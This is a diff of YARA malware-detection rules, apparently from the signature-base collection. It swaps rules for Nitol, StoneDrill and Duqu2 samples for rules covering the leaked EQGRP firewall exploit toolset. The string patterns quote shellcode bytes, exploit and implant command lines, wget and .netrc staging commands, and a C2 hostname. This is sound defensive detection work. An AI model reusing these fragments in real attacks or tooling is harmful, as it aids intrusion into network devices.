-		$s6 = "\x1f#[ \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#" fullword ascii
-		$s7 = "nwsaPAgEnT" fullword ascii
-		$s8 = "%-24s %-15s 0x%x(%d) " fullword ascii
+		$s1 = "IMPLANT" fullword ascii
+		$s2 = "KEEPGOING" fullword ascii
+		$s3 = "upgrade_implant" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of ( $x* ) or 4 of them )
+		( uint16( 0 ) == 0x457f and filesize < 200KB and 2 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_Backdoor_Nitol_Jun17 : FILE
+rule SIGNATURE_BASE_EQGRP_Workit
 {
 	meta:
-		description = "Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader"
+		description = "EQGRP Toolset Firewall - file workit.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7dd26868-59e0-51a1-b12a-3b69d6246ff5"
-		date = "2017-06-04"
-		modified = "2023-01-07"
-		reference = "https://goo.gl/OOB3mH"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eternalblue_non_wannacry.yar#L38-L61"
+		id = "b582f990-5bd5-592d-a7c0-475fdfffc38c"
+		date = "2016-08-16"
+		modified = "2023-01-27"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L542-L566"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9035b8bd74c284f170f8c9767d96580dba243786abaa3b2e79e05a981f8fa204"
+		logic_hash = "1fa61e8c2012e664fee97ff608bcd8845bbd9701fa02d39d49379f7f83a5636d"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		hash1 = "cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946"
+		quality = 35
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fb533b4d255b4e6072a4fa2e1794e38a165f9aa66033340c2f4f8fd1da155fac"
 
 	strings:
-		$x1 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)" fullword ascii
-		$x2 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)" fullword ascii
-		$x3 = "TCPConnectFloodThread.target = %s" fullword ascii
-		$s1 = "\\Program Files\\Internet Explorer\\iexplore.exe" ascii
-		$s2 = "%c%c%c%c%c%c.exe" fullword ascii
-		$s3 = "GET %s%s HTTP/1.1" fullword ascii
-		$s4 = "CCAttack.target = %s" fullword ascii
-		$s5 = "Accept-Language: zh-cn" fullword ascii
-		$s6 = "jdfwkey" fullword ascii
-		$s7 = "hackqz.f3322.org:8880" fullword ascii
+		$s1 = "macdef init > /tmp/.netrc;" fullword ascii
+		$s2 = "/usr/bin/wget http://" ascii
+		$s3 = "HOME=/tmp ftp" fullword ascii
+		$s4 = " >> /tmp/.netrc;" fullword ascii
+		$s5 = "/usr/rapidstream/bin/tftp" fullword ascii
+		$s6 = "created shell_command:" fullword ascii
+		$s7 = "rm -f /tmp/.netrc;" fullword ascii
+		$s8 = "echo quit >> /tmp/.netrc;" fullword ascii
+		$s9 = "echo binary >> /tmp/.netrc;" fullword ascii
+		$s10 = "chmod 600 /tmp/.netrc;" fullword ascii
+		$s11 = "created cli_command:" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 5 of ( $s* ) ) ) or ( all of them )
+		6 of them
 }
-
-rule SIGNATURE_BASE_Susp_File_Enumerator_With_Encrypted_Resource_101 : FILE
+rule SIGNATURE_BASE_EQGRP_Tinyhttp_Setup : FILE
 {
 	meta:
-		description = "Generic detection for samples that enumerate files with encrypted resource called 101"
-		author = "Kaspersky Lab"
-		id = "9bc16ec2-c94c-54f5-b09c-88a78e9e3fb2"
-		date = "2025-01-04"
+		description = "EQGRP Toolset Firewall - file tinyhttp_setup.sh"
+		author = "Florian Roth (Nextron Systems)"
+		id = "71dcc48f-f551-5596-9f03-dbbae470a62b"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stonedrill.yar#L12-L41"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L568-L584"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2cd0a5f1e9bcce6807e57ec8477d222a"
-		hash = "c843046e54b755ec63ccb09d0a689674"
-		logic_hash = "0a207038b3cbba88d05cd6a053fd14337ac1fbb08b2a532b542ee2bb6b881a5a"
-		score = 65
-		quality = 44
+		logic_hash = "0d560206e634f3bfeffe5b7de3edf02f6c76443ffb5c0de37180e63276a19457"
+		score = 75
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3d12c83067a9f40f2f5558d3cf3434bbc9a4c3bb9d66d0e3c0b09b9841c766a0"
 
 	strings:
-		$mz = "This program cannot be run in DOS mode."
-		$a1 = "FindFirstFile" ascii wide nocase
-		$a2 = "FindNextFile" ascii wide nocase
-		$a3 = "FindResource" ascii wide nocase
-		$a4 = "LoadResource" ascii wide nocase
+		$x1 = "firefox http://127.0.0.1:8000/$_name" fullword ascii
+		$x2 = "What is the name of your implant:" fullword ascii
+		$x3 = "killall thttpd" fullword ascii
+		$x4 = "copy http://<IP>:80/$_name flash:/$_name" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them and filesize < 700000 and pe.number_of_sections > 4 and pe.number_of_resources > 1 and pe.number_of_resources < 15 and for any i in ( 0 .. pe.number_of_resources - 1 ) : ( ( math.entropy ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) > 7.8 ) and pe.resources [ i ] . id == 101 and pe.resources [ i ] . length > 20000 and pe.resources [ i ] . language == 0 and not ( $mz in ( pe.resources [ i ] . offset..pe.resources [ i ] . offset + pe.resources [ i ] . length ) ) )
+		( uint16( 0 ) == 0x2123 and filesize < 2KB and 1 of ( $x* ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Stonedrill_Main_Sub : FILE
+rule SIGNATURE_BASE_EQGRP_Shellcode
 {
 	meta:
-		description = "Rule to detect StoneDrill (decrypted) samples"
-		author = "Kaspersky Lab"
-		id = "92f53e6a-8f49-5ffa-8c16-3ec3e6f2bdcd"
-		date = "2023-12-05"
+		description = "EQGRP Toolset Firewall - file shellcode.py"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d923c1de-c6eb-511f-ae1f-bf3ac6e0eae8"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stonedrill.yar#L43-L56"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L586-L605"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "794094c0cbb81f6f971e16de36d444351b17cf38a91d8210f914b80da7d9ed26"
+		logic_hash = "69a04db721a0d17720f9db9386d47309f01d1fc31bd5e833cedb9e1c2eb573ae"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "d01781f1246fd1b64e09170bd6600fe1"
-		hash2 = "ac3c25534c076623192b9381f926ba0d"
-		version = "1.0"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ac9decb971dd44127a6ca0d35ac153951f0735bb4df422733046098eca8f8b7f"
 
 	strings:
-		$code = {B8 08 00 FE 7F FF 30 8F 44 24 ?? 68 B4 0F 00 00 FF 15 ?? ?? ?? 00 B8 08 00 FE 7F FF 30 8F 44 24 ?? 8B ?? 24 [1 - 4] 2B ?? 24 [6] F7 ?1 [5 - 12] 00}
+		$s1 = "execute_post = '\\xe8\\x00\\x00\\x00\\x00\\x5d\\xbe\\xef\\xbe\\xad\\xde\\x89\\xf7\\x89\\xec\\x29\\xf4\\xb8\\x03\\x00\\x00\\x00" ascii
+		$s2 = "tiny_exec = '\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x03\\x00\\x01\\x00\\x00" ascii
+		$s3 = "auth_id = '\\x31\\xc0\\xb0\\x03\\x31\\xdb\\x89\\xe1\\x31\\xd2\\xb6\\xf0\\xb2\\x0d\\xcd\\x80\\x3d\\xff\\xff\\xff\\xff\\x75\\x07" ascii
+		$c1 = { e8 00 00 00 00 5d be ef be ad de 89 f7 89 ec 29 f4 b8 03 00 00 00 }
+		$c3 = { 31 c0 b0 03 31 db 89 e1 31 d2 b6 f0 b2 0d cd 80 3d ff ff ff ff 75 07 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $code and filesize < 5000000
+		1 of them
 }
-rule SIGNATURE_BASE_Stonedrill_BAT_1 : FILE
+rule SIGNATURE_BASE_EQGRP_EPBA : FILE
 {
 	meta:
-		description = "Rule to detect Batch file from StoneDrill report"
+		description = "EQGRP Toolset Firewall - file EPBA.script"
 		author = "Florian Roth (Nextron Systems)"
-		id = "92f53e6a-8f49-5ffa-8c16-3ec3e6f2bdcd"
-		date = "2023-12-05"
+		id = "5159c2f4-20b7-590d-b216-b3468c26e459"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stonedrill.yar#L65-L80"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L607-L626"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d7263a527cae45072082c0f2fd0abc33acb2a25b34c06becf36fbd36f0697d5c"
+		logic_hash = "c483efdcfbb0dd8602a552b519d3aa52fca12549c0ec1660d813a2a1da66c3a6"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "53e1af1b410ace0934c152b5df717d8a5a8f5fdd8b9eb329a44d94c39b066ff7"
 
 	strings:
-		$s1 = "set u100=" ascii
-		$s2 = "set u200=service" ascii fullword
-		$s3 = "set u800=%~dp0" ascii fullword
-		$s4 = "\"%systemroot%\\system32\\%u100%\"" ascii
-		$s5 = "%\" start /b %systemroot%\\system32\\%" ascii
+		$x1 = "./epicbanana_2.0.0.1.py -t 127.0.0.1 --proto=ssh --username=cisco --password=cisco --target_vers=asa804 --mem=NA -p 22 " fullword ascii
+		$x2 = "-t TARGET_IP, --target_ip=TARGET_IP -- Either 127.0.0.1 or Win Ops IP" fullword ascii
+		$x3 = "./bride-1100 --lp 127.0.0.1 --implant 127.0.0.1 --sport RHP --dport RHP" fullword ascii
+		$x4 = "--target_vers=TARGET_VERS    target Pix version (pix712, asa804) (REQUIRED)" fullword ascii
+		$x5 = "-p DEST_PORT, --dest_port=DEST_PORT defaults: telnet=23, ssh=22 (optional) - Change to LOCAL redirect port" fullword ascii
+		$x6 = "this operation is complete, BananaGlee will" fullword ascii
+		$x7 = "cd /current/bin/FW/BGXXXX/Install/LP" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x68636540 and 2 of them and filesize < 500
+		( uint16( 0 ) == 0x2023 and filesize < 7KB and 1 of ( $x* ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Stonedrill_Service_Install : FILE
+rule SIGNATURE_BASE_EQGRP_BPIE : FILE
 {
 	meta:
-		description = "Rule to detect Batch file from StoneDrill report"
+		description = "EQGRP Toolset Firewall - file BPIE-2201.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "92f53e6a-8f49-5ffa-8c16-3ec3e6f2bdcd"
-		date = "2023-12-05"
+		id = "a73f0216-3994-5ee6-8a8c-cbcc1279898e"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stonedrill.yar#L82-L96"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L628-L648"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "52abe90c7f87ffeace4b58f9959e5a21c475bfa7ae2c5bc2744fe5fe43ffdda8"
+		logic_hash = "ab13dde40015fba80f55bc9d1b82c94ec2421e9ea263b70ad8ec0a7a74c43c9a"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "697e80cf2595c85f7c931693946d295994c55da17a400f2c9674014f130b4688"
 
 	strings:
-		$s1 = "127.0.0.1 >nul && sc config" ascii
-		$s2 = "LocalService\" && ping -n" ascii fullword
-		$s3 = "127.0.0.1 >nul && sc start" ascii fullword
-		$s4 = "sc config NtsSrv binpath= \"C:\\WINDOWS\\system32\ntssrvr64.exe" ascii
+		$s1 = "profProcessPacket" fullword ascii
+		$s2 = ".got_loader" fullword ascii
+		$s3 = "getTimeSlotCmdHandler" fullword ascii
+		$s4 = "getIpIpCmdHandler" fullword ascii
+		$s5 = "LOADED" fullword ascii
+		$s6 = "profStartScan" fullword ascii
+		$s7 = "tmpData.1" fullword ascii
+		$s8 = "resetCmdHandler" fullword ascii
 
 	condition:
-		2 of them and filesize < 500
+		( uint16( 0 ) == 0x457f and filesize < 70KB and 6 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Stonedrill_Ntssrvr32 : FILE
+rule SIGNATURE_BASE_EQGRP_Jetplow_SH
 {
 	meta:
-		description = "Detects malware from StoneDrill threat report"
+		description = "EQGRP Toolset Firewall - file jetplow.sh"
 		author = "Florian Roth (Nextron Systems)"
-		id = "92f53e6a-8f49-5ffa-8c16-3ec3e6f2bdcd"
-		date = "2017-03-07"
-		modified = "2023-01-27"
-		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stonedrill.yar#L98-L118"
+		id = "e7780540-29c9-5827-8ac0-a685d9ba8a5f"
+		date = "2016-08-16"
+		modified = "2023-12-05"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L650-L666"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f1122aba53f32b10bd5f43cb619aa5d668b1457f3a5ea2a68c97254ab8631faa"
+		logic_hash = "8ae203527c4e41ae169c63521bb08d5199c43dfd1028574a1791ab1f8f198105"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "394a7ebad5dfc13d6c75945a61063470dc3b68f7a207613b79ef000e1990909b"
+		hash1 = "ee266f84a1a4ccf2e789a73b0a11242223ed6eba6868875b5922aea931a2199c"
 
 	strings:
-		$s1 = "g\\system32\\" wide
-		$s2 = "ztvttw" fullword wide
-		$s3 = "lwizvm" fullword ascii
-		$op1 = { 94 35 77 73 03 40 eb e9 }
-		$op2 = { 80 7c 41 01 00 74 0a 3d }
-		$op3 = { 74 0a 3d 00 94 35 77 }
+		$s1 = "cd /current/bin/FW/BANANAGLEE/$bgver/Install/LP/jetplow" fullword ascii
+		$s2 = "***** Please place your UA in /current/bin/FW/OPS *****" fullword ascii
+		$s3 = "ln -s ../jp/orig_code.bin orig_code_pixGen.bin" fullword ascii
+		$s4 = "*****             Welcome to JetPlow              *****" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and 3 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Stonedrill_Malware_2 : FILE
+rule SIGNATURE_BASE_EQGRP_BBANJO : FILE
 {
 	meta:
-		description = "Detects malware from StoneDrill threat report"
+		description = "EQGRP Toolset Firewall - file BBANJO-3011.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "92f53e6a-8f49-5ffa-8c16-3ec3e6f2bdcd"
-		date = "2017-03-07"
+		id = "81af4769-7007-51f1-9569-bc370618b4ff"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stonedrill.yar#L120-L145"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L668-L687"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cb1f8b24465ad8ca19dd540b1f8b63a73bc2624958bf45547b15c10583d07281"
+		logic_hash = "8ee2e817732674bf7ff5f396271a2a90da8f401d7ea0f0a3f51c21712adb3ea4"
 		score = 75
-		quality = 60
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "69530d78c86031ce32583c6800f5ffc629acacb18aac4c8bb5b0e915fc4cc4db"
+		hash1 = "f09c2f90464781a08436321f6549d350ecef3d92b4f25b95518760f5d4c9b2c3"
 
 	strings:
-		$s1 = "cmd /c WMIC Process Call Create \"C:\\Windows\\System32\\Wscript.exe //NOLOGO " fullword wide
-		$s2 = "C:\\ProgramData\\InternetExplorer" fullword wide
-		$s3 = "WshShell.CopyFile \"" fullword wide
-		$s4 = "Abd891.tmp" fullword wide
-		$s5 = "Set WshShell = Nothing" fullword wide
-		$s6 = "AaCcdDeFfGhiKLlMmnNoOpPrRsSTtUuVvwWxyZz32" fullword ascii
-		$s7 = "\\FileInfo.txt" wide
-		$x1 = "C-PDI-C-Cpy-T.vbs" fullword wide
-		$x2 = "C-Dlt-C-Org-T.vbs" fullword wide
-		$x3 = "C-PDC-C-Cpy-T.vbs" fullword wide
-		$x4 = "AC-PDC-C-Cpy-T.vbs" fullword wide
-		$x5 = "C-Dlt-C-Trsh-T.tmp" fullword wide
+		$s1 = "get_lsl_interfaces" fullword ascii
+		$s2 = "encryptFC4Payload" fullword ascii
+		$s3 = ".got_loader" fullword ascii
+		$s4 = "beacon_getconfig" fullword ascii
+		$s5 = "LOADED" fullword ascii
+		$s6 = "FormBeaconPacket" fullword ascii
+		$s7 = "beacon_reconfigure" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 700KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) ) or 5 of them
+		( uint16( 0 ) == 0x457f and filesize < 50KB and all of them )
 }
-rule SIGNATURE_BASE_Stonedrill : FILE
+rule SIGNATURE_BASE_EQGRP_BPATROL_2201 : FILE
 {
 	meta:
-		description = "Detects malware from StoneDrill threat report"
+		description = "EQGRP Toolset Firewall - file BPATROL-2201.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "92f53e6a-8f49-5ffa-8c16-3ec3e6f2bdcd"
-		date = "2017-03-07"
+		id = "864a346c-e8aa-5c66-9867-faccb14b8bee"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stonedrill.yar#L147-L170"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L689-L706"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ef7173e259f985083d5451a2d464047b40112a084a05d471797d5dbf2d0fb21d"
+		logic_hash = "a2e9aa4627924c99dd3a342174855df3f0d545a67fd2293ca5601eeae70ae010"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "2bab3716a1f19879ca2e6d98c518debb107e0ed8e1534241f7769193807aac83"
-		hash2 = "62aabce7a5741a9270cddac49cd1d715305c1d0505e620bbeaec6ff9b6fd0260"
-		hash3 = "69530d78c86031ce32583c6800f5ffc629acacb18aac4c8bb5b0e915fc4cc4db"
+		hash1 = "aa892750b893033eed2fedb2f4d872f79421174eb217f0c34a933c424ae66395"
 
 	strings:
-		$x1 = "C-Dlt-C-Trsh-T.tmp" fullword wide
-		$x2 = "C-Dlt-C-Org-T.vbs" fullword wide
-		$s1 = "Hello dear" fullword ascii
-		$s2 = "WRZRZRAR" fullword ascii
-		$opa1 = { 66 89 45 d8 6a 64 ff }
-		$opa2 = { 8d 73 01 90 0f bf 51 fe }
+		$s1 = "dumpConfig" fullword ascii
+		$s2 = "getstatusHandler" fullword ascii
+		$s3 = ".got_loader" fullword ascii
+		$s4 = "xtractdata" fullword ascii
+		$s5 = "KEEPGOING" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of ( $x* ) or ( all of ( $op* ) and all of ( $s* ) )
+		( uint16( 0 ) == 0x457f and filesize < 40KB and all of them )
 }
-rule SIGNATURE_BASE_Stonedrill_VBS_1 : FILE
+rule SIGNATURE_BASE_EQGRP_Extrabacon
 {
 	meta:
-		description = "Detects malware from StoneDrill threat report"
+		description = "EQGRP Toolset Firewall - file extrabacon_1.1.0.1.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a7ee3bd4-eeae-5eb4-92e7-9601ec17300a"
-		date = "2017-03-07"
+		id = "79b998ef-e548-5038-b8ad-da1abf362e7f"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stonedrill.yar#L172-L192"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L708-L725"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "79416d27a6a09d544becd84f8e551c09b94c97181f8fddc481f47e42763d47ac"
+		logic_hash = "1a010d5e6324715f8e1bf29e957c365fabd2986fece53aaea23bba8ee59bd808"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0f4d608a87e36cb0dbf1b2d176ecfcde837070a2b2a049d532d3d4226e0c9587"
+		hash1 = "59d60835fe200515ece36a6e87e642ee8059a40cb04ba5f4b9cce7374a3e7735"
 
 	strings:
-		$x1 = "wmic /NameSpace:\\\\root\\default Class StdRegProv Call SetStringValue hDefKey = \"&H80000001\" sSubKeyName = \"Software\\Micros" ascii
-		$x2 = "ping 1.0.0.0 -n 1 -w 20000 > nul" fullword ascii
-		$s1 = "WshShell.CopyFile \"%COMMON_APPDATA%\\Chrome\\" ascii
-		$s2 = "WshShell.DeleteFile \"%temp%\\" ascii
-		$s3 = "WScript.Sleep(10 * 1000)" fullword ascii
-		$s4 = "Set WshShell = CreateObject(\"Scripting.FileSystemObject\") While WshShell.FileExists(\"" ascii
-		$s5 = " , \"%COMMON_APPDATA%\\Chrome\\" ascii
+		$x1 = "To disable password checking on target:" fullword ascii
+		$x2 = "[-] target is running" fullword ascii
+		$x3 = "[-] problem importing version-specific shellcode from" fullword ascii
+		$x4 = "[+] importing version-specific shellcode" fullword ascii
+		$s5 = "[-] unsupported target version, abort" fullword ascii
 
 	condition:
-		( filesize < 1KB and 1 of ( $x* ) or 2 of ( $s* ) )
+		1 of them
 }
-rule SIGNATURE_BASE_Duqu2_Sample1 : FILE
+rule SIGNATURE_BASE_EQGRP_Sploit_Py
 {
 	meta:
-		description = "Detects malware - Duqu2 (cross-matches with IronTiger malware and Derusbi)"
+		description = "EQGRP Toolset Firewall - file sploit.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "39ba04f1-df45-5513-ab8f-12097a79cdc7"
-		date = "2016-07-02"
+		id = "9f403965-5fb1-55b2-bef6-65c18e08e58f"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_duqu2.yar#L10-L28"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L727-L742"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bf6b60bcae2b41487ede11581c82b32e6bc912445008b1655e4f75be65cf6596"
-		score = 80
+		logic_hash = "874eaffcbc191951db39ba6c85e8c80b83b0df8d33136b6cdcdefcb28e596474"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6b146e3a59025d7085127b552494e8aaf76450a19c249bfed0b4c09f328e564f"
-		hash2 = "8e97c371633d285cd8fc842f4582705052a9409149ee67d97de545030787a192"
-		hash3 = "2796a119171328e91648a73d95eb297edc220e8768f4bbba5fb7237122a988fc"
-		hash4 = "5559fcc93eef38a1c22db66a3e0f9e9f026c99e741cc8b1a4980d166f2696188"
+		hash1 = "0316d70a5bbf068a7fc791e08e816015d04ec98f088a7ff42af8b9e769b8d1f6"
 
 	strings:
-		$x1 = "SELECT `Data` FROM `Binary` WHERE `Name`='%s%i'" fullword wide
-		$s2 = "MSI.dll" fullword ascii
+		$x1 = "the --spoof option requires 3 or 4 fields as follows redir_ip" ascii
+		$x2 = "[-] timeout waiting for response - target may have crashed" fullword ascii
+		$x3 = "[-] no response from health check - target may have crashed" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 40KB and $x1 ) or ( all of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Duqu2_Sample2 : FILE
+rule SIGNATURE_BASE_EQGRP_Uninstallpbd
 {
 	meta:
-		description = "Detects Duqu2 Malware"
+		description = "EQGRP Toolset Firewall - file uninstallPBD.bat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a32f54a3-8656-5592-ac40-17330bfca319"
-		date = "2016-07-02"
+		id = "0153cb2a-a0de-51f9-80c2-22136d56f16d"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_duqu2.yar#L30-L50"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L744-L759"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6afd87d472929f56272eb6f28970f2c8be5eb08e6126287391aee1269de1100d"
-		score = 80
+		logic_hash = "51be8a491a1e228dfc6156a86e9f2ffc923c39d0649bbc031ea1bafe1af22a45"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d12cd9490fd75e192ea053a05e869ed2f3f9748bf1563e6e496e7153fb4e6c98"
-		hash2 = "5ba187106567e8d036edd5ddb6763f89774c158d2a571e15d76572d8604c22a0"
-		hash3 = "6e09e1a4f56ea736ff21ad5e188845615b57e1a5168f4bdaebe7ddc634912de9"
-		hash4 = "c16410c49dc40a371be22773f420b7dd3cfd4d8205cf39909ad9a6f26f55718e"
-		hash5 = "2ecb26021d21fcef3d8bba63de0c888499110a2b78e4caa6fa07a2b27d87f71b"
-		hash6 = "2c9c3ddd4d93e687eb095444cef7668b21636b364bff55de953bdd1df40071da"
